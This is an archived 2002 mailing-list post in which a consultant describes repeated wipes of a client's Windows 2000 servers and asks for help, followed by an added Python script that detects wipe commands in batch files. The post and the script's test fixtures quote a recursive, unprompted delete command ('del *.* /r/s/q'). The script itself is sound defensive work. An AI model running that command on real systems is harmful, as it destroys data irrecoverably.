mysterious attack on Windows 2000 servers (Help needed)
From: Manish Jain (manishjn@hotmail.com)
Date: 09/14/02
- Next in thread: Mark Strelecki, ACP: "Re: mysterious attack on Windows 2000 servers (Help needed)"
- Reply: Mark Strelecki, ACP: "Re: mysterious attack on Windows 2000 servers (Help needed)"
- Reply: karl [x y]: "Re: mysterious attack on Windows 2000 servers (Help needed)"
- Reply: belgarath: "Re: mysterious attack on Windows 2000 servers (Help needed)"
From: "Manish Jain" <manishjn@hotmail.com> Date: Sat, 14 Sep 2002 13:05:55 -0700
Dear All,

For the last few weeks my client has been having mysterious attacks on his servers. He has 3 servers on his network and all of them are running Windows 2000 Server SP3. One of the servers is the Domain Controller, another one is the mail server running MS Exchange 2000 SP3, and the last one is the firewall/proxy server running MS ISA 2000. He is connected to other branch offices through IPLC and VSAT links. The internet gateway is at his head office in another city.

Now the real problem:

On Aug 16, all 3 of his servers were compromised and he found that all the files from his boot/system drive had been deleted. When he rebooted his servers he got the message that NTKRNL32.exe is missing and the servers couldn't reboot. This happened on all 3 servers. The system administrator was not very aware of information security, and they reinstalled all 3 servers.

Then the same incident happened again on 22 Aug, and after the incident they reinstalled the systems again. Then they hired me to find out the cause of the problem and fix it for future prevention. I started analyzing the network traffic and checked all their system configuration, but I couldn't find any clue on this. Then on 29th Aug all 3 servers got the same attack again and all the files from C:\ (which was the boot and system drive) were deleted. I got a snapshot of the system and after analysis I found that the folder structure was intact but most of the system-critical files had been deleted. I found a batch file in c:\ named "README.BAT". In this file a simple DOS command was written: "del *.* /r/s/q". I thought that this would be a worm and I started searching over the internet about this. But I couldn't find anything over the internet related to this kind of incident. Then I did the OS hardening and updated the systems with all the latest patches. I also created an empty file "readme.bat" in c:\ and removed all access to this file.

Unfortunately this didn't work out and all the servers were wiped again on 2nd Sep. This time the batch file was not readme.bat, but the same del command was written in Autoexec.bat.

I also installed network packet capturing software running 24 hrs. I analyzed the packets but I couldn't find anything. Then the incident happened again on 9 Sep and I have no clue what to do now. I have taken all the precautions I can think of. At last I thought of disabling the delete command and batch file execution itself, so that I may stop this incident from happening again.

I request everyone to please suggest, if you know, how I can stop this incident from happening and how to find out how it is happening. Your help will be much appreciated.

Thanks in advance.

Regards,
Manish Jain
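As an added example (not part of the original post or thread), a small Python check of the kind the poster was looking for: scan the batch files in a drive root for an unattended recursive delete, the indicator he found in README.BAT and later in Autoexec.bat. The drive root and the sample files are constructed in a temporary directory so it runs offline; it also treats `erase`, cmd's alias for `del`, as the same command.

```python
"""Flag batch files that would wipe a drive when run (added example, not from the post)."""
from __future__ import annotations
import re
import tempfile
from pathlib import Path

# `del` or its alias `erase`, optionally prefixed with '@', followed by its arguments.
_DEL_RE = re.compile(r"^\s*@?\s*(?:del|erase)\b(?P<args>.*)$", re.IGNORECASE)
# Batch comments: `rem ...` or `:: ...`; never executed, so not a finding.
_COMMENT_RE = re.compile(r"^\s*(?:rem\b|::)", re.IGNORECASE)


def is_wipe_command(line: str) -> bool:
    """True if one batch line is a recursive (/S), unprompted (/Q) delete of a wildcard."""
    if _COMMENT_RE.match(line):
        return False
    m = _DEL_RE.match(line)
    if not m:
        return False
    args = m.group("args").lower()
    # "/r/s/q" and "/s /q" both yield the same switch set.
    switches = {s.lstrip("/") for s in re.findall(r"/[a-z]", args)}
    wildcard_target = "*" in args
    return {"s", "q"} <= switches and wildcard_target


def scan_startup_scripts(root: Path) -> dict[str, list[str]]:
    """Map each *.bat directly under `root` to the wiping lines it contains."""
    findings: dict[str, list[str]] = {}
    for bat in sorted(p for p in root.iterdir() if p.suffix.lower() == ".bat"):
        text = bat.read_text(errors="replace")
        hits = [ln.rstrip() for ln in text.splitlines() if is_wipe_command(ln)]
        if hits:
            findings[bat.name] = hits
    return findings


def demo() -> dict[str, list[str]]:
    """Build a constructed stand-in for C:\\ holding the post's two indicators and one benign script."""
    root = Path(tempfile.mkdtemp())
    (root / "README.BAT").write_text("del *.* /r/s/q\n")                      # as described in the post
    (root / "Autoexec.bat").write_text("@echo off\nDEL *.* /r/s/q\n")          # as described in the post
    (root / "backup.bat").write_text("rem del *.* /s /q\ndel C:\\temp\\old.log\n")  # benign, constructed
    return scan_startup_scripts(root)


if __name__ == "__main__":
    for name, lines in demo().items():
        print(f"{name}: {lines}")
```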